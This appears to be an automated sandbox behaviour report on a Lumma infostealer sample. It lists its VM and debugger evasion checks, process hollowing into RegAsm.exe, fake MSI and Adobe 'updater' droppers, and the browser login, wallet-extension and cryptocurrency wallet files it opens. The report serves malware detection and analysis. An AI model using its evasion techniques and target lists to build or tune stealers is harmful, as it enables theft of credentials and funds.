                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeStalling execution: Execution stalls by calling Sleepgraph_0-17837
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSystem information queried: FirmwareTableInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: FirmwareTableInformation
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeSpecial instruction interceptor: First address: F70B95 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeMemory allocated: 1120000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeMemory allocated: 2CE0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeMemory allocated: 2A20000 memory reserve | memory write watch
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeMemory allocated: C60000 memory reserve | memory write watch
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeMemory allocated: 2830000 memory reserve | memory write watch
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeMemory allocated: 4830000 memory reserve | memory write watch
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeMemory allocated: B20000 memory reserve | memory write watch
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeMemory allocated: 2730000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeMemory allocated: 2A20000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeMemory allocated: 2C60000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeMemory allocated: 2BB0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeMemory allocated: 1590000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeMemory allocated: 3350000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeMemory allocated: 1830000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exeThread delayed: delay time: 922337203685477
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_0-17837
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key enumerated: More than 145 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exe TID: 6760Thread sleep count: 98 > 30
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe TID: 4460Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2492Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2492Thread sleep time: -30000s >= -30000s
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe TID: 4312Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe TID: 5852Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5780Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5804Thread sleep time: -90000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2088Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe TID: 428Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6612Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6636Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe TID: 2812Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2004Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00D52870 FindFirstFileA,FindNextFileA,GetLastError,SetFileAttributesA,GetLastError,RemoveDirectoryA,GetLastError,GetLastError,std::_Throw_Cpp_error,std::_Throw_Cpp_error,CreateDirectoryA,std::_Throw_Cpp_error,std::_Throw_Cpp_error,0_2_00D52870
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00C8C82B FindFirstFileExW,GetLastError,0_2_00C8C82B
                  Source: 2q45IEa3Ee.exe, 00000000.00000003.1644298203.00000000017C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}~"
                  Source: RegAsm.exe, 00000011.00000002.2130384793.0000000001576000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWJ+
                  Source: RegAsm.exe, 00000011.00000002.2130384793.000000000153E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
                  Source: 2q45IEa3Ee.exe, 00000000.00000003.1625497117.0000000001570000.00000004.00001000.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1625377908.0000000001570000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: \SystemRoot\system32\ntkrnlp.exeSDT\VBOX__
                  Source: 2q45IEa3Ee.exe, 00000000.00000002.1877753884.0000000001760000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&)0
                  Source: 2q45IEa3Ee.exe, 00000000.00000002.1878839470.0000000005FB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: RegAsm.exe, RegAsm.exe, 0000000B.00000002.1939197101.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.1939197101.000000000071D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2048327163.000000000145A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2048327163.000000000149C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000011.00000002.2130384793.0000000001576000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                  Source: 2q45IEa3Ee.exe, 00000000.00000003.1625841550.0000000001570000.00000004.00001000.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1625917956.0000000001570000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: \SystemRoot\system32\ntkrnlmp.exeSDT\VBOX__
                  Source: 2q45IEa3Ee.exe, 00000000.00000002.1877753884.00000000017B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP!
                  Source: RegAsm.exe, 0000000B.00000002.1939197101.000000000071D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBn
                  Source: 2q45IEa3Ee.exe, 00000000.00000003.1644298203.00000000017C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: 2q45IEa3Ee.exe, 00000000.00000003.1626124846.0000000001570000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: \SystemRoot\system32\ntkrnlmp.exeST\VBOX__
                  Source: 2q45IEa3Ee.exe, 00000000.00000003.1626252203.0000000001570000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: \SystemRoot\system32\ntkrnmp.exeSDT\VBOX__
                  Source: 2q45IEa3Ee.exe, 00000000.00000002.1878839470.0000000006002000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: 2q45IEa3Ee.exe, 00000000.00000003.1625585878.0000000001570000.00000004.00001000.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1626031634.0000000001570000.00000004.00001000.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1625688795.0000000001570000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: \SystemRoot\system32\ntkrnlm.exeSDT\VBOX__
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exe System information queried: ModuleInformation
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exe Process information queried: ProcessInformation

                  Anti Debugging

                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exe Thread information set: HideFromDebugger
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exe Open window title or class name: regmonclass
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exe Open window title or class name: gbdyllo
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exe Open window title or class name: procmon_window_class
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exe Open window title or class name: ollydbg
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exe Open window title or class name: filemonclass
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exe Process queried: DebugPort
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exe Process queried: DebugObjectHandle
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 7_2_00435B70 LdrInitializeThunk,7_2_00435B70
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exe Code function: 0_2_00D3B380 LoadLibraryA,GetProcAddress,0_2_00D3B380
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: lumma1504[1].exe.0.dr, Angelo.cs Reference to suspicious API methods: Program.VirtualProtect(ref Eugene.SuperBook[0], Eugene.SuperBook.Length, 64u, ref oldProtect)
                  Source: lumma1504[1].exe.0.dr, Angelo.cs Reference to suspicious API methods: Program.WaitForSingleObject(Program.CreateRemoteThread(uint.MaxValue, 0u, 0u, ref Eugene.SuperBook[num], RemoteObjects.userBuffer, 0, ref WPA), uint.MaxValue)
                  Source: 0.2.2q45IEa3Ee.exe.e324c0.1.raw.unpack, ActiveApp.cs Reference to suspicious API methods: OpenProcess(33554432u, bInheritHandle: false, dwProcessId)
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe Code function: 6_2_02CE2549 CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,6_2_02CE2549
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43C000
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43F000
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44A000
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 10E1008
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43C000
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43F000
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44A000
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1055008
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 240008
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43C000
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43F000
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44A000
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: E93008
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 11C3008
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exe Process created: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe "C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe"
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exe Queries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
                  Source: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe Queries volume information: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe Queries volume information: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe VolumeInformation
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exe Code function: 0_2_00C8DEAD GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,0_2_00C8DEAD
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: RegAsm.exe, 00000007.00000002.1920810654.0000000001472000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.1936828284.00000000037E5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.1936237566.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.1939197101.0000000000705000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.1939197101.0000000000785000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2049332296.000000000358C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                  Stealing of Sensitive Information

                  Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 1740, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 5900, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 2128, type: MEMORYSTR
                  Source: Yara match File source: sslproxydump.pcap, type: PCAP
                  Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
                  Source: Yara match File source: 00000000.00000003.1824382503.0000000005E26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: C:\Users\user\AppData\Local\Temp\uw5Stgma3gbM9Xo4g_6cCoQ.zip, type: DROPPED
                  Source: RegAsm.exe, 00000007.00000002.1920616270.000000000140A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Electrum\wallets
                  Source: RegAsm.exe, 00000007.00000002.1920616270.000000000140A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Jaxx Liberty
                  Source: RegAsm.exe, 00000007.00000002.1920616270.000000000140A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
                  Source: RegAsm.exe, 00000007.00000002.1920616270.000000000140A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
                  Source: RegAsm.exe, 00000007.00000002.1920616270.000000000140A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ExodusWeb3
                  Source: 2q45IEa3Ee.exe, 00000000.00000002.1878839470.0000000005FB1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Binance\app-store.json
                  Source: RegAsm.exe, 00000007.00000002.1920616270.000000000140A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum
                  Source: RegAsm.exe, 00000007.00000002.1920616270.000000000140A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                  Source: RegAsm.exe, 00000007.00000002.1920616270.000000000140A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENTJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
